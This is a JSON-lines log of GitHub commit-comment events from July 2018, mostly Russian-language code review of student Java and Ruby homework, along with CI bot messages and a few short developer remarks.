{"id":"8000603305","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"OsetrovaD/JavaHomework"},"payload":{"comment":{"id":29793676,"position":16,"line":16,"path":"src/lesson4secondattempt/Task1.java","commit_id":"f997f3d51f529bec96b22d045f812f58add8c35d","created_at":"2018-07-22T17:52:09Z","updated_at":"2018-07-22T17:52:09Z","author_association":"NONE","body":"достаточно одного прохода по массиву для сдвига, не оптимально"}},"created_at":"2018-07-22T17:52:09Z"}
{"id":"8000603701","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"OsetrovaD/JavaHomework"},"payload":{"comment":{"id":29793677,"position":19,"line":19,"path":"src/lesson4secondattempt/Task1.java","commit_id":"f997f3d51f529bec96b22d045f812f58add8c35d","created_at":"2018-07-22T17:52:27Z","updated_at":"2018-07-22T17:52:27Z","author_association":"NONE","body":"всегда перетираешь первый элемент, не понятно зачем, можно проще"}},"created_at":"2018-07-22T17:52:27Z"}
{"id":"8000605155","type":"CommitCommentEvent","actor":{"login":"kawaakari"},"repo":{"name":"kawaakari/Homework"},"payload":{"comment":{"id":29793680,"position":15,"line":15,"path":"homeworkfour/Task1.java","commit_id":"65f06fcb7becaedb1b9e338a9dfc4820dadfdaa8","created_at":"2018-07-22T17:53:33Z","updated_at":"2018-07-22T17:53:33Z","author_association":"OWNER","body":"step может являться глаголом, но ладно, я поняла)"}},"created_at":"2018-07-22T17:53:33Z"}
{"id":"8000605775","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"PavelHe/otus-books"},"payload":{"comment":{"id":29793681,"position":17,"line":17,"path":"src/main/java/com/github/pavelhe/model/Comment.java","commit_id":"b9dad99b916a325c699dd58f47085e7c8565d9e5","created_at":"2018-07-22T17:54:01Z","updated_at":"2018-07-22T17:54:01Z","author_association":"NONE","body":"Ну немножно по другому предполагалось) Что это типа коммент к одной книге) Но так даже очень интересно получилось."}},"created_at":"2018-07-22T17:54:01Z"}
{"id":"8000606101","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"PavelHe/otus-books"},"payload":{"comment":{"id":29793682,"position":62,"line":62,"path":"src/main/java/com/github/pavelhe/model/Comment.java","commit_id":"b9dad99b916a325c699dd58f47085e7c8565d9e5","created_at":"2018-07-22T17:54:14Z","updated_at":"2018-07-22T17:54:14Z","author_association":"NONE","body":"И это бы тогда наоборот бы было."}},"created_at":"2018-07-22T17:54:14Z"}
{"id":"8000606250","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"OsetrovaD/JavaHomework"},"payload":{"comment":{"id":29793683,"position":29,"line":29,"path":"src/lesson5/Task1.java","commit_id":"6213e91c463d129570b8f497d0d6977438df0818","created_at":"2018-07-22T17:54:21Z","updated_at":"2018-07-22T17:54:21Z","author_association":"NONE","body":"не надо делать отступ в первой строчке функции"}},"created_at":"2018-07-22T17:54:21Z"}
{"id":"8000606445","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"grshane/strik3"},"payload":{"comment":{"id":29793685,"position":null,"line":null,"path":null,"commit_id":"6574133332236613e4eed0c2febe0813eaa54ad4","created_at":"2018-07-22T17:54:32Z","updated_at":"2018-07-22T17:54:32Z","author_association":"OWNER","body":"Created multidev environment [strik3#ci-5](https://dashboard.pantheon.io/sites/8745c3dd-7938-4b3e-88ab-edc9518ad49b#ci-5).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-5-strik3.pantheonsite.io/)"}},"created_at":"2018-07-22T17:54:32Z"}
{"id":"8000606530","type":"CommitCommentEvent","actor":{"login":"linkloker"},"repo":{"name":"linkloker/cariloker.xml"},"payload":{"comment":{"id":29793686,"position":null,"line":null,"path":null,"commit_id":"30ee7356acae7e36ba3b709cecf8146c368b8c73","created_at":"2018-07-22T17:54:36Z","updated_at":"2018-07-22T17:54:36Z","author_association":"OWNER","body":"Saya Sedang mempelajari ini, dan bagai manapun ini comit saya untuk lebih cerdas dalam proses pembelajaran"}},"created_at":"2018-07-22T17:54:36Z"}
{"id":"8000606543","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"PavelHe/otus-books"},"payload":{"comment":{"id":29793687,"position":8,"line":8,"path":"src/main/java/com/github/pavelhe/model/converters/LocalDateTimeAttributeConverter.java","commit_id":"b9dad99b916a325c699dd58f47085e7c8565d9e5","created_at":"2018-07-22T17:54:36Z","updated_at":"2018-07-22T17:54:36Z","author_association":"NONE","body":"Крутяк!"}},"created_at":"2018-07-22T17:54:36Z"}
{"id":"8000606926","type":"CommitCommentEvent","actor":{"login":"kawaakari"},"repo":{"name":"kawaakari/Homework"},"payload":{"comment":{"id":29793689,"position":19,"line":19,"path":"homeworkfour/Task1.java","commit_id":"65f06fcb7becaedb1b9e338a9dfc4820dadfdaa8","created_at":"2018-07-22T17:54:54Z","updated_at":"2018-07-22T17:54:54Z","author_association":"OWNER","body":"Результат [10, 1, 2, 3, 4, 5, 6, 7, 8, 9]. Он заменяется."}},"created_at":"2018-07-22T17:54:54Z"}
{"id":"8000607213","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"PavelHe/otus-books"},"payload":{"comment":{"id":29793690,"position":13,"line":15,"path":"src/main/java/com/github/pavelhe/service/BookServiceImpl.java","commit_id":"b9dad99b916a325c699dd58f47085e7c8565d9e5","created_at":"2018-07-22T17:55:08Z","updated_at":"2018-07-22T17:55:08Z","author_association":"NONE","body":"Вот удалили бы классы JDBC и не надо было бы ставить)"}},"created_at":"2018-07-22T17:55:08Z"}
{"id":"8000607576","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"OsetrovaD/JavaHomework"},"payload":{"comment":{"id":29793692,"position":30,"line":30,"path":"src/lesson5/Task2.java","commit_id":"6213e91c463d129570b8f497d0d6977438df0818","created_at":"2018-07-22T17:55:25Z","updated_at":"2018-07-22T17:55:25Z","author_association":"NONE","body":"можно было сделать не перебором каждое с каждым постоянно, а switch например"}},"created_at":"2018-07-22T17:55:25Z"}
{"id":"8000608463","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"OsetrovaD/JavaHomework"},"payload":{"comment":{"id":29793694,"position":47,"line":47,"path":"src/lesson5/Task2.java","commit_id":"6213e91c463d129570b8f497d0d6977438df0818","created_at":"2018-07-22T17:56:05Z","updated_at":"2018-07-22T17:56:05Z","author_association":"NONE","body":"почему выходить из цикла здесь?"}},"created_at":"2018-07-22T17:56:05Z"}
{"id":"8000608483","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"PavelHe/otus-books"},"payload":{"comment":{"id":29793695,"position":43,"line":58,"path":"src/main/resources/schema.sql","commit_id":"b9dad99b916a325c699dd58f47085e7c8565d9e5","created_at":"2018-07-22T17:56:06Z","updated_at":"2018-07-22T17:56:06Z","author_association":"NONE","body":"Круто! Правда круто! Не стали отдавать схему на откуп хибернейту)"}},"created_at":"2018-07-22T17:56:06Z"}
{"id":"8000609594","type":"CommitCommentEvent","actor":{"login":"robske110"},"repo":{"name":"poggit-orphanage/WorldProtect"},"payload":{"comment":{"id":29793697,"position":null,"line":null,"path":null,"commit_id":"56c8a75ac84bf8b4b8f44f9ca115111b7a4c84a5","created_at":"2018-07-22T17:56:53Z","updated_at":"2018-07-22T17:56:53Z","author_association":"MEMBER","body":"could you please push an update on poggit with this fix?"}},"created_at":"2018-07-22T17:56:53Z"}
{"id":"8000609874","type":"CommitCommentEvent","actor":{"login":"lllBarcodeslll"},"repo":{"name":"npitre/cramfs-tools"},"payload":{"comment":{"id":29793698,"position":null,"line":null,"path":null,"commit_id":"1ab51c8291e6d8a71dfbacc8f2faeef15db7792d","created_at":"2018-07-22T17:57:06Z","updated_at":"2018-07-22T17:57:06Z","author_association":"NONE","body":"K"}},"created_at":"2018-07-22T17:57:06Z"}
{"id":"8000609879","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"OsetrovaD/JavaHomework"},"payload":{"comment":{"id":29793699,"position":55,"line":55,"path":"src/lesson5/Task2.java","commit_id":"6213e91c463d129570b8f497d0d6977438df0818","created_at":"2018-07-22T17:57:06Z","updated_at":"2018-07-22T17:57:06Z","author_association":"NONE","body":"сложно написано, много неочевидных ветвлений"}},"created_at":"2018-07-22T17:57:06Z"}
{"id":"8000610185","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"OsetrovaD/JavaHomework"},"payload":{"comment":{"id":29793700,"position":6,"line":6,"path":"src/lesson6/Point.java","commit_id":"1d1fb0cff7fbe4feeca9b825b89611d9d3fd3b35","created_at":"2018-07-22T17:57:18Z","updated_at":"2018-07-22T17:57:18Z","author_association":"NONE","body":"оступ между классом и полями"}},"created_at":"2018-07-22T17:57:18Z"}
{"id":"8000611078","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"OsetrovaD/JavaHomework"},"payload":{"comment":{"id":29793702,"position":19,"line":19,"path":"src/lesson6/Rectangle.java","commit_id":"1d1fb0cff7fbe4feeca9b825b89611d9d3fd3b35","created_at":"2018-07-22T17:57:56Z","updated_at":"2018-07-22T17:57:56Z","author_association":"NONE","body":"можно просто у одной точки вызвать метод дистанс и передать другую"}},"created_at":"2018-07-22T17:57:56Z"}
{"id":"8000611182","type":"CommitCommentEvent","actor":{"login":"subrotosingh"},"repo":{"name":"subrotosingh/awslearning"},"payload":{"comment":{"id":29793703,"position":null,"line":null,"path":null,"commit_id":"891607eeaf7f6c53e29b4f546b15e8a2815d834d","created_at":"2018-07-22T17:58:01Z","updated_at":"2018-07-22T17:58:01Z","author_association":"OWNER","body":"pdf file is deleted"}},"created_at":"2018-07-22T17:58:01Z"}
{"id":"8000611487","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"OsetrovaD/JavaHomework"},"payload":{"comment":{"id":29793704,"position":26,"line":26,"path":"src/lesson6/Rectangle.java","commit_id":"1d1fb0cff7fbe4feeca9b825b89611d9d3fd3b35","created_at":"2018-07-22T17:58:15Z","updated_at":"2018-07-22T17:58:15Z","author_association":"NONE","body":"а если точки отрицательны?"}},"created_at":"2018-07-22T17:58:15Z"}
{"id":"8000612825","type":"CommitCommentEvent","actor":{"login":"kawaakari"},"repo":{"name":"kawaakari/Homework"},"payload":{"comment":{"id":29793705,"position":14,"line":14,"path":"homeworksix/Test.java","commit_id":"3815102cac13bdbafeec91af0c38ba5099a9a1a8","created_at":"2018-07-22T17:59:10Z","updated_at":"2018-07-22T17:59:10Z","author_association":"OWNER","body":"Его нет, он не нашел в себе сил правильно работать :("}},"created_at":"2018-07-22T17:59:10Z"}
{"id":"8000613658","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"PavelHe/otus-books"},"payload":{"comment":{"id":29793706,"position":27,"line":27,"path":"src/test/java/com/github/pavelhe/dao/integration/jpa/TestAuthorDaoIntegrationJPA.java","commit_id":"b9dad99b916a325c699dd58f47085e7c8565d9e5","created_at":"2018-07-22T17:59:50Z","updated_at":"2018-07-22T17:59:50Z","author_association":"NONE","body":"А такие тесты лучше не писать, это к данным сильно привзязывает. Лучше доабвить и проверить, что количество изменилось."}},"created_at":"2018-07-22T17:59:50Z"}
{"id":"8000614552","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"PavelHe/otus-books"},"payload":{"comment":{"id":29793716,"position":1,"line":1,"path":"src/test/resources/schema-test.sql","commit_id":"b9dad99b916a325c699dd58f47085e7c8565d9e5","created_at":"2018-07-22T18:00:23Z","updated_at":"2018-07-22T18:00:23Z","author_association":"NONE","body":"Тестовую можно не создавать - пусть используется из src/main"}},"created_at":"2018-07-22T18:00:23Z"}
{"id":"8000615016","type":"CommitCommentEvent","actor":{"login":"bjusufbe"},"repo":{"name":"ATLANTBH/abhhomepage-automation"},"payload":{"comment":{"id":29793718,"position":18,"line":46,"path":"lib/contact.rb","commit_id":"7356c283312acc04d1b766ebdfdf6335cd87d68d","created_at":"2018-07-22T18:00:43Z","updated_at":"2018-07-22T18:00:43Z","author_association":"CONTRIBUTOR","body":"@zcilic : This would be very hard to detect because we cannot expect them to run tests with debugger and inspect correct css/xpaths. I wouldn't go into these details"}},"created_at":"2018-07-22T18:00:43Z"}
{"id":"8000616503","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Katerina207/fp1a"},"payload":{"comment":{"id":29793719,"position":8,"line":8,"path":"src/homework/array/FirstTask.java","commit_id":"b10dfeb26fd69e047aa53ea875d4d7ffdf636d87","created_at":"2018-07-22T18:01:51Z","updated_at":"2018-07-22T18:01:51Z","author_association":"NONE","body":"не надо делать отступ в первой строчке функции"}},"created_at":"2018-07-22T18:01:51Z"}
{"id":"8000617171","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Katerina207/fp1a"},"payload":{"comment":{"id":29793720,"position":22,"line":22,"path":"src/homework/array/FirstTask.java","commit_id":"b10dfeb26fd69e047aa53ea875d4d7ffdf636d87","created_at":"2018-07-22T18:02:17Z","updated_at":"2018-07-22T18:02:17Z","author_association":"NONE","body":"не надо делать вывод на консоль, метод должен иметь одну обязанность, делай это в функции мейн"}},"created_at":"2018-07-22T18:02:17Z"}
{"id":"8000617573","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Katerina207/fp1a"},"payload":{"comment":{"id":29793721,"position":41,"line":41,"path":"src/homework/array/FourthTask.java","commit_id":"b10dfeb26fd69e047aa53ea875d4d7ffdf636d87","created_at":"2018-07-22T18:02:36Z","updated_at":"2018-07-22T18:02:36Z","author_association":"NONE","body":"count += array[i].length"}},"created_at":"2018-07-22T18:02:36Z"}
{"id":"8000617943","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Katerina207/fp1a"},"payload":{"comment":{"id":29793722,"position":39,"line":39,"path":"src/homework/array/SecondTask.java","commit_id":"b10dfeb26fd69e047aa53ea875d4d7ffdf636d87","created_at":"2018-07-22T18:02:52Z","updated_at":"2018-07-22T18:02:52Z","author_association":"NONE","body":"\r\nкод не отформатирован, использовать Ctrl + Alt + L перед коммитом"}},"created_at":"2018-07-22T18:02:52Z"}
{"id":"8000618321","type":"CommitCommentEvent","actor":{"login":"tarek360"},"repo":{"name":"tarek360/emptyapp"},"payload":{"comment":{"id":29793723,"position":null,"line":null,"path":null,"commit_id":"0d26b64d3bd0f6e45e95d104b6b10079a7378bdc","created_at":"2018-07-22T18:03:08Z","updated_at":"2018-07-22T18:03:08Z","author_association":"OWNER","body":"✅ Detekt: Great Stuff! 👍"}},"created_at":"2018-07-22T18:03:08Z"}
{"id":"8000618958","type":"CommitCommentEvent","actor":{"login":"tarek360"},"repo":{"name":"tarek360/emptyapp"},"payload":{"comment":{"id":29793725,"position":null,"line":null,"path":null,"commit_id":"69e5239c67ecfe5d87856b38359626b7cd54de5e","created_at":"2018-07-22T18:03:36Z","updated_at":"2018-07-22T18:03:36Z","author_association":"OWNER","body":"✅ Detekt: Great Stuff! 👍"}},"created_at":"2018-07-22T18:03:36Z"}
{"id":"8000620145","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Katerina207/fp1a"},"payload":{"comment":{"id":29793726,"position":22,"line":22,"path":"src/homework/array/ThirdTask.java","commit_id":"b10dfeb26fd69e047aa53ea875d4d7ffdf636d87","created_at":"2018-07-22T18:04:26Z","updated_at":"2018-07-22T18:04:26Z","author_association":"NONE","body":"values2 не передавать третьим параметром, а определять уже внутри функции, иначе можно фигню передать"}},"created_at":"2018-07-22T18:04:26Z"}
{"id":"8000620927","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29793730,"position":1,"line":2,"path":"Lesson2/l2_task3_fibonachi.rb","commit_id":"075dc6ea9cdeaa75fe230089a2ac4bc16544bbfe","created_at":"2018-07-22T18:05:04Z","updated_at":"2018-07-22T18:05:04Z","author_association":"NONE","body":"уже писал, здесь не нужны пробелы в начале и в конце массива"}},"created_at":"2018-07-22T18:05:04Z"}
{"id":"8000620964","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Katerina207/fp1a"},"payload":{"comment":{"id":29793731,"position":42,"line":42,"path":"src/homework/array/ThirdTask.java","commit_id":"b10dfeb26fd69e047aa53ea875d4d7ffdf636d87","created_at":"2018-07-22T18:05:06Z","updated_at":"2018-07-22T18:05:06Z","author_association":"NONE","body":"можно было в один for написать, сложно выходит у тебя"}},"created_at":"2018-07-22T18:05:06Z"}
{"id":"8000622582","type":"CommitCommentEvent","actor":{"login":"yogthos"},"repo":{"name":"yogthos/krueger"},"payload":{"comment":{"id":29793738,"position":11,"line":24,"path":"src/clj/krueger/layout.clj","commit_id":"446a71352cb34cd618d6a1f0ed89b6ca4b0e56b4","created_at":"2018-07-22T18:06:19Z","updated_at":"2018-07-22T18:06:19Z","author_association":"OWNER","body":"yup :P"}},"created_at":"2018-07-22T18:06:19Z"}
{"id":"8000623015","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Katerina207/fp1a"},"payload":{"comment":{"id":29793739,"position":39,"line":39,"path":"src/homework/oop/Point.java","commit_id":"77fffe0eb88be41f5d755fb1d21cf4ef379814e2","created_at":"2018-07-22T18:06:36Z","updated_at":"2018-07-22T18:06:36Z","author_association":"NONE","body":"есть функция Math.abs"}},"created_at":"2018-07-22T18:06:36Z"}
{"id":"8000623577","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Katerina207/fp1a"},"payload":{"comment":{"id":29793740,"position":18,"line":18,"path":"src/homework/oop/Rectangle.java","commit_id":"77fffe0eb88be41f5d755fb1d21cf4ef379814e2","created_at":"2018-07-22T18:07:00Z","updated_at":"2018-07-22T18:07:00Z","author_association":"NONE","body":"просто у одной точки вызови метод дистанс и передай другую "}},"created_at":"2018-07-22T18:07:00Z"}
{"id":"8000624886","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Katerina207/fp1a"},"payload":{"comment":{"id":29793741,"position":17,"line":17,"path":"src/homework/string/FirstTask.java","commit_id":"77fffe0eb88be41f5d755fb1d21cf4ef379814e2","created_at":"2018-07-22T18:07:59Z","updated_at":"2018-07-22T18:07:59Z","author_association":"NONE","body":"newString.reverse().toString()\r\nНе использовать new String(\"another string\")"}},"created_at":"2018-07-22T18:07:59Z"}
{"id":"8000625030","type":"CommitCommentEvent","actor":{"login":"vikramalva"},"repo":{"name":"proteinevolution/Toolkit"},"payload":{"comment":{"id":29793742,"position":null,"line":null,"path":null,"commit_id":"997b1978561b7c32eac260d18a82c35fdaeeba82","created_at":"2018-07-22T18:08:06Z","updated_at":"2018-07-22T18:08:06Z","author_association":"MEMBER","body":"works on Rye too now!"}},"created_at":"2018-07-22T18:08:06Z"}
{"id":"8000625214","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Katerina207/fp1a"},"payload":{"comment":{"id":29793743,"position":28,"line":28,"path":"src/homework/string/FirstTask.java","commit_id":"77fffe0eb88be41f5d755fb1d21cf4ef379814e2","created_at":"2018-07-22T18:08:14Z","updated_at":"2018-07-22T18:08:14Z","author_association":"NONE","body":"не делай лишних отступов после класса и после функций"}},"created_at":"2018-07-22T18:08:14Z"}
{"id":"8000625568","type":"CommitCommentEvent","actor":{"login":"albharath99"},"repo":{"name":"albharath99/Hello-world"},"payload":{"comment":{"id":29793744,"position":null,"line":null,"path":null,"commit_id":"f955b11a594fede70469e4ca0b916c167ca7f52c","created_at":"2018-07-22T18:08:29Z","updated_at":"2018-07-22T18:08:29Z","author_association":"OWNER","body":"oh goof !\r\nnice first commit"}},"created_at":"2018-07-22T18:08:29Z"}
{"id":"8000625611","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Katerina207/fp1a"},"payload":{"comment":{"id":29793745,"position":47,"line":47,"path":"src/homework/string/SecondTask.java","commit_id":"77fffe0eb88be41f5d755fb1d21cf4ef379814e2","created_at":"2018-07-22T18:08:31Z","updated_at":"2018-07-22T18:08:31Z","author_association":"NONE","body":"break в default"}},"created_at":"2018-07-22T18:08:31Z"}
{"id":"8000625635","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29793746,"position":23,"line":16,"path":"Lesson2/l2_task5_date_number.rb","commit_id":"c7ec46a712de00ae03ba7be7bdd527563ea38e61","created_at":"2018-07-22T18:08:33Z","updated_at":"2018-07-22T18:08:33Z","author_association":"NONE","body":"скобки здесь не нужны, т.к. у оператора `&&` приоритет выше, чему у `||`\r\nесли их все же писать, то не нужны пробелы в начале и в конце (оставлял подробный комментарий в прошлой сдаче)"}},"created_at":"2018-07-22T18:08:33Z"}
{"id":"8000625793","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Katerina207/fp1a"},"payload":{"comment":{"id":29793747,"position":49,"line":49,"path":"src/homework/string/SecondTask.java","commit_id":"77fffe0eb88be41f5d755fb1d21cf4ef379814e2","created_at":"2018-07-22T18:08:42Z","updated_at":"2018-07-22T18:08:42Z","author_association":"NONE","body":"разбивай на функции"}},"created_at":"2018-07-22T18:08:42Z"}
{"id":"8000626569","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Katerina207/fp1a"},"payload":{"comment":{"id":29793748,"position":61,"line":61,"path":"src/homework/string/SecondTask.java","commit_id":"77fffe0eb88be41f5d755fb1d21cf4ef379814e2","created_at":"2018-07-22T18:09:17Z","updated_at":"2018-07-22T18:09:17Z","author_association":"NONE","body":"вывод не делать здесь"}},"created_at":"2018-07-22T18:09:17Z"}
{"id":"8000627543","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29793749,"position":null,"line":null,"path":null,"commit_id":"075dc6ea9cdeaa75fe230089a2ac4bc16544bbfe","created_at":"2018-07-22T18:10:00Z","updated_at":"2018-07-22T18:10:00Z","author_association":"NONE","body":"еще раз про скобки\r\n\r\nне рекомендуется ставить пробел после открывающей скобки и перед закрывающей (кроме фигурных скобок в случае хеша или блока):\r\n```ruby\r\n# bad\r\narray = [ 1, 2, 3 ]\r\na = ( 1 + 2 ) / 3\r\n%w( a e i)\r\nsome_method( arg )\r\n\r\n#good\r\narray = [1, 2, 3]\r\na = (1 + 2) / 3\r\n%w(a e i)\r\nsome_method(arg)\r\n```"}},"created_at":"2018-07-22T18:10:00Z"}
{"id":"8000628821","type":"CommitCommentEvent","actor":{"login":"gayhub-com"},"repo":{"name":"JasonQS/Anti-recall"},"payload":{"comment":{"id":29793750,"position":null,"line":null,"path":null,"commit_id":"3da0f4f3d165c7665ebea81047b41647521970f7","created_at":"2018-07-22T18:10:57Z","updated_at":"2018-07-22T18:10:57Z","author_association":"NONE","body":"有时候能用,但是大部分都是没法用,信息根本没有录入.特别是微信\r\n通知监听服务开关虽然一直是开着但是总是提示不能正常工作,只能先关掉再开.\r\n总之bug还有好多,不知道是不是我手机问题...."}},"created_at":"2018-07-22T18:10:57Z"}
{"id":"8000629496","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"ayakauleu/java-courses"},"payload":{"comment":{"id":29793751,"position":5,"line":5,"path":"src/lesson4/Homework1.java","commit_id":"3dd47ef2d411e53b30187327f0791b086d09491d","created_at":"2018-07-22T18:11:27Z","updated_at":"2018-07-22T18:11:27Z","author_association":"NONE","body":"\r\nделать отступ в одну строку между классом и функцией, а также между функциями"}},"created_at":"2018-07-22T18:11:27Z"}
{"id":"8000629977","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"ayakauleu/java-courses"},"payload":{"comment":{"id":29793753,"position":16,"line":16,"path":"src/lesson4/Homework1.java","commit_id":"3dd47ef2d411e53b30187327f0791b086d09491d","created_at":"2018-07-22T18:11:51Z","updated_at":"2018-07-22T18:11:51Z","author_association":"NONE","body":"код не отформатирован, использовать Ctrl + Alt + L перед коммитом"}},"created_at":"2018-07-22T18:11:51Z"}
{"id":"8000630247","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"ayakauleu/java-courses"},"payload":{"comment":{"id":29793754,"position":14,"line":14,"path":"src/lesson4/Homework1.java","commit_id":"3dd47ef2d411e53b30187327f0791b086d09491d","created_at":"2018-07-22T18:12:02Z","updated_at":"2018-07-22T18:12:02Z","author_association":"NONE","body":"выносить все в отдельные функции - main только для тестирования"}},"created_at":"2018-07-22T18:12:02Z"}
{"id":"8000630554","type":"CommitCommentEvent","actor":{"login":"rzulian"},"repo":{"name":"donkeytech/gaia-engine"},"payload":{"comment":{"id":29793755,"position":4,"line":558,"path":"src/engine.ts","commit_id":"e7cf5662eaaea929fb5f2f80dc8b4563d4a2a165","created_at":"2018-07-22T18:12:15Z","updated_at":"2018-07-22T18:12:15Z","author_association":"COLLABORATOR","body":"I see. Wouldn't it better to have an explicit choose tile phase even for std techs not free, with also a \"decline advance\", which will be more coherent with the rules \"player can advance\"? In this case the available research area will be already correct."}},"created_at":"2018-07-22T18:12:15Z"}
{"id":"8000631231","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"ayakauleu/java-courses"},"payload":{"comment":{"id":29793756,"position":12,"line":12,"path":"src/lesson4/Homework2.java","commit_id":"3dd47ef2d411e53b30187327f0791b086d09491d","created_at":"2018-07-22T18:12:47Z","updated_at":"2018-07-22T18:12:47Z","author_association":"NONE","body":"почему break? а если есть еще дубликаты?"}},"created_at":"2018-07-22T18:12:47Z"}
{"id":"8000632089","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"ayakauleu/java-courses"},"payload":{"comment":{"id":29793761,"position":9,"line":9,"path":"src/lesson4/Homework2.java","commit_id":"3dd47ef2d411e53b30187327f0791b086d09491d","created_at":"2018-07-22T18:13:26Z","updated_at":"2018-07-22T18:13:26Z","author_association":"NONE","body":"странное условие, надо искать в той части массива, которые ты еще не прошел"}},"created_at":"2018-07-22T18:13:26Z"}
{"id":"8000632363","type":"CommitCommentEvent","actor":{"login":"ash-sids"},"repo":{"name":"kubernetes/website"},"payload":{"comment":{"id":29793762,"position":null,"line":null,"path":null,"commit_id":"21fd86ed4b891102fbfa9f8246ecec336c995246","created_at":"2018-07-22T18:13:39Z","updated_at":"2018-07-22T18:13:39Z","author_association":"NONE","body":"The command to roll back the update has a typo ('v10') , it should be ---\r\nkubectl set image deployments/kubernetes-bootcamp kubernetes-bootcamp=gcr.io/google-samples/kubernetes-bootcamp:v1"}},"created_at":"2018-07-22T18:13:39Z"}
{"id":"8000632651","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"ayakauleu/java-courses"},"payload":{"comment":{"id":29793764,"position":17,"line":17,"path":"src/lesson4/Homework2.java","commit_id":"3dd47ef2d411e53b30187327f0791b086d09491d","created_at":"2018-07-22T18:13:52Z","updated_at":"2018-07-22T18:13:52Z","author_association":"NONE","body":"ничего не вынесено в функции"}},"created_at":"2018-07-22T18:13:52Z"}
{"id":"8000633064","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"ayakauleu/java-courses"},"payload":{"comment":{"id":29793765,"position":23,"line":23,"path":"src/lesson4/Homework3.java","commit_id":"3dd47ef2d411e53b30187327f0791b086d09491d","created_at":"2018-07-22T18:14:12Z","updated_at":"2018-07-22T18:14:12Z","author_association":"NONE","body":"я говорил, что желательно не использовать do-while"}},"created_at":"2018-07-22T18:14:12Z"}
{"id":"8000633870","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"ayakauleu/java-courses"},"payload":{"comment":{"id":29793767,"position":16,"line":16,"path":"src/lesson4/Homework4.java","commit_id":"3dd47ef2d411e53b30187327f0791b086d09491d","created_at":"2018-07-22T18:14:50Z","updated_at":"2018-07-22T18:14:50Z","author_association":"NONE","body":"reslength +=arr[i].length"}},"created_at":"2018-07-22T18:14:50Z"}
{"id":"8000634851","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"ayakauleu/java-courses"},"payload":{"comment":{"id":29793773,"position":18,"line":18,"path":"src/lesson4/Homework4.java","commit_id":"3dd47ef2d411e53b30187327f0791b086d09491d","created_at":"2018-07-22T18:15:32Z","updated_at":"2018-07-22T18:15:32Z","author_association":"NONE","body":"называть переменные и параметры функции нормально, не сокращенные имена или еще что-то, они должны отражать суть того, что там лежит"}},"created_at":"2018-07-22T18:15:32Z"}
{"id":"8000635034","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"ayakauleu/java-courses"},"payload":{"comment":{"id":29793775,"position":12,"line":12,"path":"src/lesson4/Homework4.java","commit_id":"3dd47ef2d411e53b30187327f0791b086d09491d","created_at":"2018-07-22T18:15:42Z","updated_at":"2018-07-22T18:15:42Z","author_association":"NONE","body":"что это int arr[][]???"}},"created_at":"2018-07-22T18:15:42Z"}
